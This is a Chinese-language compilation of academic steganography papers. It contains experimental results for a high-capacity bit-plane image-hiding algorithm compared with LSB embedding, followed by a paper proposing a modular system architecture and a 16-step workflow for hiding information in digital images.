为验证本算法的性能,以512×512×24 的原始Lenna图像进行试验。首先试验本算法的最大信息嵌入量,z的值设为0,设RGB三色所对应的y的取值为(yr,yg,yb),这三个值分别选取(5,5,4)、(4,5,4),(4,4,4),(4,5,3)和(3,5,3)几组不同的值进行嵌入试验,嵌入后的结果分别如图1的(b)、(c)、(d)、(e)、(f)所示。由试验结果可知,当yr≥4、yg≥5、yb≥3时,对人类的视觉系统而言是不可感知的,超过这个值时就会影响视觉效果,即(yr,yg,yb)取(4,5,3)时,隐藏的信息的不可感知性就能满足要求,此时达到可隐藏信息量的最大值。再选取标准图像peppers和tulips进行试验,当yr,yg,yb分别取4,5,3时,嵌入信息后的载密图像如图2所示,可见在嵌入隐藏信息后同样能满足视觉的不可感知性要求。当yr,yg,yb分别取4,5,3时,在Lenna、peppers和tulips图像中可嵌入的信息量见表1,不难看出本算法的信息隐藏量非常大,嵌入比平均值约为36%,而目前认为信息隐藏量大的LSB算法的嵌入容量的嵌入比为12.5%,可见本算法的可嵌入容量远比LSB算法大很多。

再以512×512×24的原始Lenna图像嵌入一幅181×252×8的灰度图像进行剪裁试验,将载有隐藏信息的图像进行如图3(c)所示的随机裁剪,然后进行隐藏信息的提取,提取的图像如图3(d)所示,说明本算法有较强的抗剪裁能力。由于本算法的嵌入容量大,同小容量的嵌入算法相比,对于同样的嵌入信息可进行反复的嵌入,一幅载体图片可嵌入多个水印信息,因此抗剪裁能力强。以512×512×24的原始Lenna图像嵌入一幅181×252×8的灰度图像进行抗干扰试验,在嵌入隐藏信息的图像上加入0.02的椒盐噪声,检测到的隐藏图像如图4(b)所示,虽然检测到的隐藏图像也有明显的噪声干扰信息,但不影响识别效果,可见本文算法一定的抗噪声干扰能力,作为隐藏图像之类的水印是能满足要求的,而计算复杂度却比同样效果的频域算法低很多。 另外当z取1时(即LSB位不隐藏信息)进行滤波试验,载密图像进行中值滤波处理后,仍可检测到隐藏的大部分信息,而LSB算法则基本检测不到隐藏的信息,说明本算法的鲁棒性比LSB算法要高很多,而此时的信息隐藏量却仍然比LSB算法大。同时由于嵌入的图像的位平面与原始图像、嵌入后的图像没有对应关系,而不像LSB算法那样将信息嵌入在一个固定的平面位,可防止位平面过滤所导致的失密,因此安全性也比LSB算法高。

隐藏技术论文范文6

关键词:信息安全 信息隐藏技术 信息隐藏系统

中图分类号:TP309 文献标识码:A 文章编号:1007-9416(2015)05-0000-00

Abstract: The existing theory of Information Hiding techniques based on digital image only focus on the algorithm research , which makes the design and performance of algorithm be limited to the research of application of the technology itself and the innovation, without a comprehensive system. This paper, collect, analyze and classify the influencing factors, based on the performance and complexity of the algorithm as the goal, and put forward a set of Information Hiding system based on digital image . Firstly, an Information Hiding system based on two sub-systems and nine functional modules is constructed. Secondly, function setting and theory basis of each module of the Information Hiding system are brought forward. Finally, mutual restriction and effect relation between modules of pre-treatment system are detailed. Information Hiding system is proposed that provides a theoretical foundation for Information Hiding techniques; especially, for algorithm design.

Key words: information security; information hiding techniques; information hiding system

基于数字图像的信息隐藏技术是一项复杂的系统工作,但现有理论[1]主要集中在算法的研究方面,关于信息隐藏系统的研究很少。目前,信息隐藏系统更多的是依靠设计者自身的素质去控制结构和应用框架,结果是基于这样的信息隐藏系统的应用可能存在性能的缺失。

针对以上问题,本文提出基于两个子系统和9个功能模块的基于数字图像的信息隐藏系统,具体功能归类和隶属关系如图1所示。

1 预处理子系统的模块设计

基于数字图像的信息隐藏预处理子系统[2]承担着信息隐藏95%以上的工作,分为4个单元,分别是信息密与编单元、载体选择解析单元[3]、算法选择单元[4]、置乱及优化单元[5],如图2所示。

1.1信息加密与编码单元的设计

信息加密与信息编码单元是对隐藏信息进行处理的单元,包含信息加密模块和信息编码模块。

信息加密模块:信息加密模块是对隐藏信息进行加密处理,使秘密信息双重保护,提高信息隐藏系统的安全。信息加密原则有:(1)基于不可见性和嵌入信息量的选择原则;(2)基于抗分析性的选择原则。模块运行如图3所示。

信息编码模块:信息编码模块是对隐藏信息进行编码处理的模块。信息编码原则有:(1)基于不可见性和嵌入信息量的选择原则;(2)基于鲁棒性的选择原则;(3)基于抗分析性的选择原则。

1.2 载体选择与解析单元的设计

载体选择与解析单元是对信息隐藏载体进行选择和处理的部分,包括载体选择模块和载体解析模块。

载体选择模块:载体选择模块的功能是根据隐藏信息的信息特性选择出合适的信息隐藏载体。选择原则有:(1)内容优先原则;(2)统计优先原则统计优先原则。根据内容优先和统计优先的载体图像选择原则,选择方法可分为高低两个层次。

载体解析模块:载体解析模块的目的是方便信息隐藏者根据载体图像的自身信息去调整要隐藏的信息,达到尽量少修改载体图像的目的。。

1.3 算法选择模块的设计

算法是信息隐藏技术中最重要的部分,而算法选择模块是选择合适算法进行信息隐藏。算法选择原则:(1)基于不可见性的选择原则;(2)基于鲁棒性的选择原则;(3)基于抗分析性的选择原则;(4)基于嵌入信息量的选择原则。

1.4 置乱与优化单元的设计

置乱与优化单元是对隐藏信息或者载体图像进行置乱处理,提高了信息隐藏系统的安全性和不可见性等系统特性。

置乱模块:置乱就是将图像的信息次序打乱,起到加密的作用。置乱还可以改变信息隐藏后的特性,整个模块运行。

优化模块:优化模块的作用是为匹配度而设立的,将初步置乱后的隐藏信息与载体解析模块解析出的数据进行比较,达到最大化的一致性,提高信息隐藏系统的性能。

预处理子系统中的7个功能模块之间不仅仅存在彼此的配合,系统的复杂性导致模块之间还存在一定的制约、冲突和影响。因此,在实际的系统设计时,要综合考虑系统最终的性能要求和实现模块功能的复杂度,权衡各个模块对系统性能的贡献和自身的设计能力,实现预期的系统性能设计目标。

2 嵌入子系统的模块设计

基于数字图像的信息隐藏系统的嵌入子系统[分为补丁模块[6]和嵌入模块。

补丁模块:补丁模块的作用就是在预处理子系统所生成的隐藏信息不能满足某些实际的应用要求情况下对隐藏工作进行补充,补丁模块生成的补充内容主要包括传递信息和无效信息。

无效信息:无效信息主要作用是用来迷惑信息隐藏分析者。一方面,无效信息可以误导和迷惑信息隐藏分析者;另一方面,无效信息的破解使信息隐藏分析者得到满足,不再继续深入破解,有效的保护了真正的秘密通信信息。

3 系统结构与运行流程

基于数字图像的信息隐藏系统包括两个子系统和9个功能模块,全面完成隐藏信息的处理、载体与隐藏算法的选择及相关传输信息的生成,整个系统运行流程如图3所示,整个运行流程包含16个步骤。

Step1.根据原始信息以及系统的性能要求,参照信息加密算法选择原则,选出最佳加密方案;

Step2.依照所选择的加密方法对原始信息进行加密操作;

Step3.输出加密后的“密文”信息,进行信息编码;

Step4.对整个信息隐藏传输的目的和要求进行汇总。根据汇总的信息,按照信息编码原则得出最佳编码方案;

Step5.按照最佳编码方案,对信息进行编码操作,得出适合的隐藏信息;

Step6.输出编码后的编码信息,为隐藏算法选择模块提供算法选择依据,为置乱选择模块提供置乱选择依据;

Step7.按照置乱选择策略,选择出置乱算法,并对隐藏信息进行置乱,输出初步置乱信息,输入到优化模块中;

Step8.读取可以获取与支配的载体图像;

Step9.对整个信息隐藏传输的目的、要求进行汇总,提取出信息传输渠道、传输信息特性以及系统传输要求;

Step10.根据信息传输渠道、传输信息特性以及系统传输要求按照载体选择原则和方法在输入的可选载体图像源中选择图像,最终确认使用的载体图像;

Step11.分别读取信息隐藏系统的性能要求、信息模块的隐藏信息特性以及载体选择模块的载体信息,选择出信息隐藏算法;

Step12.根据信息隐藏算法,解析出载体图像本身所含有的信息,输入到优化模块进行优化;

Step13.按照优化模型进行参数优化,输出置乱参数到置乱模块;

Step14.根据相关置乱参数对信息进行置乱,输出最终的置乱后的信息;

Step15.根据传输渠道的相关信息,由补丁模块生成补充信息;

Step16.将置乱后的信息和补充信息进行结合,生成最终的隐藏信息。

4 结语

本文以信息隐藏算法的性能结构为基础,从系统的角度对信息隐藏技术进行研究。首先,提出了由两个子系统和9个功能模块组成的基于数字图像的信息隐藏系统。然后,对预处理子系统进行研究,给出了各个模块的功能设置和理论基础。其次,对预处理子系统中7个模块之间的冲突与协调问题进行相关说明。介绍了嵌入子系统所包含的两个功能模块。最后,基于对以上两个子系统的研究,给出了整个基于数字图像的信息隐藏系统的构建和运行流程。完善了基于数字图像信息隐藏系统的理论体系,为提高系统性能提供可靠的依据,为系统的安全性分析提供保证。

参考文献

[1]郝夏斐,牛红惠.图像加密信息识别技术研究[J].科技通报,2012.8.

[2]张显全,祝英俊,孙容海,刘潘梅.基于位平面的彩色图像大容量信息隐藏方法.光电子・激光,2009,20(8):1092-1095.

[3]WuHsien-Chu,WangHao-Cheng,TsaiChwei-Shyong, WangChung-Ming. Reversible image steganographic scheme via predictive coding, Displays, 2010, 31(1):35-43.

[4]朱荣华. 一种CRC 并行计算原理及实现方法.电子学报,1999,27(4):143-145.